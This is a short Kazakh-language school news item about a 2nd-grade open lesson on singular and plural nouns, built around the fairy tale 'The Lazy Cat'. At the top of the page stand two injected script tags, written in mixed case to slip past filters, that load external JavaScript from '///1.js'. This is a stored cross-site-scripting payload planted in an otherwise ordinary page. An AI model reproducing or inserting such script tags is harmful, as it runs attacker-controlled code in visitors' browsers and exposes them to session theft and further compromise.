<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
07.03.2018
Наурыз айының бесінші жұлдызында Ғ.Әбдірахманұлы атындағы Қима орта мектебінде қазақ тілі пәнінен 2 сынып оқушыларыменен «Зат есімнің жекеше және көпше түрі» атты тақырыбында ашық сабақ өткізілді.
Сабақтың мақсаты: оқушыларды зат есімнің жекеше және
көпше түрімен таныстыра отыра, көптік жалғауларды сөздерге дұрыс жалғай білуге, бір-бірінен айыра білуге үйрету.
Сабақ барысында әдебиетке және ертегіге деген қызығушылығын арттыра отырып, «Жалқау мысық» ертегі желісі бойынша өткізілді. Ертегідегі кездескен кейіпкерлерге көмектесу үшін тапсырмалар мен жаттығулар беріліп, орындалды. Әр тапсырма жаңа тақырыпқа байланысты берілді. Оқушылар жаңа тақырыпты меңгерді және кері байланыс орнатылды.
Просмотров: 592